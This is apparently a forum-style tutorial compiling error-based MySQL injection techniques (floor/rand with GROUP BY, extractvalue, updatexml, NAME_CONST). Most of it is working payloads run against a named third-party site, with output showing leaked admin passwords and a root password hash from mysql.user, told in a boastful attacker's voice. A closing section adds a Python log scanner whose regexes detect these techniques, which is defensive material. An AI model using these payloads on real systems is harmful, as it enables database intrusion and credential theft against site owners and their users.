1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers an error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the duplicate-key error. To retrieve other data, replace version() with a different subquery.

For example, to retrieve the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test run:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test run:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: exploiting NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
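As an added example (not code from either of the posts above), here is a small Python log scanner that recognises the request-side signatures of the four techniques on this page (floor(rand(0)*2) with GROUP BY, extractvalue(), updatexml() and the double NAME_CONST column trick) together with the MySQL error strings they provoke when a site echoes raw query errors back to the client. The access-log and application-log lines it scans are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the four error-based techniques on this page. They are
# matched against the URL-decoded line, so '+' and %XX encoding do not hide them.
REQUEST_SIGNATURES = [
    ("floor_rand_groupby", re.compile(r"(?=.*floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\))(?=.*group\s+by)", re.I | re.S)),
    ("extractvalue", re.compile(r"extractvalue\s*\(", re.I)),
    ("updatexml", re.compile(r"updatexml\s*\(", re.I)),
    ("name_const_dup_column", re.compile(r"name_const\s*\(.*name_const\s*\(", re.I | re.S)),
]
# Server-side signatures: the MySQL error text each technique provokes. These strings in an
# HTTP response or application log mean the site is echoing raw query errors to the client.
ERROR_SIGNATURES = [
    ("floor_rand_groupby", re.compile(r"ERROR 1062 \(23000\): Duplicate entry '.*' for key 'group_key'")),
    ("extractvalue/updatexml", re.compile(r"ERROR 1105 \(HY000\): XPATH syntax error: '")),
    ("name_const_dup_column", re.compile(r"Duplicate column name '")),
]

def classify_request(line: str) -> list[str]:
    """Names of the techniques whose request-side signature appears in the decoded line."""
    decoded = unquote_plus(line)
    return [name for name, rx in REQUEST_SIGNATURES if rx.search(decoded)]

def classify_error(line: str) -> list[str]:
    """Names of the techniques whose MySQL error signature appears in the line."""
    return [name for name, rx in ERROR_SIGNATURES if rx.search(line)]

def scan_log(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Return (line_no, 'request' or 'error', techniques) for every line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        req = classify_request(line)
        if req:
            hits.append((n, "request", req))
        err = classify_error(line)
        if err:
            hits.append((n, "error", err))
    return hits

# Constructed sample: one benign request, three probe requests and two leaked MySQL errors.
SAMPLE_LOG = [
    "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 200",
    "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) 500",
    "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- 500",
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+table_name+from+information_schema.tables+limit+1))) 500",
    "ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'",
]
```

Calling scan_log(SAMPLE_LOG) flags lines 2 to 6 with the technique each one corresponds to; an error-signature hit without a matching request hit is the stronger finding, since it shows the database error reached the client.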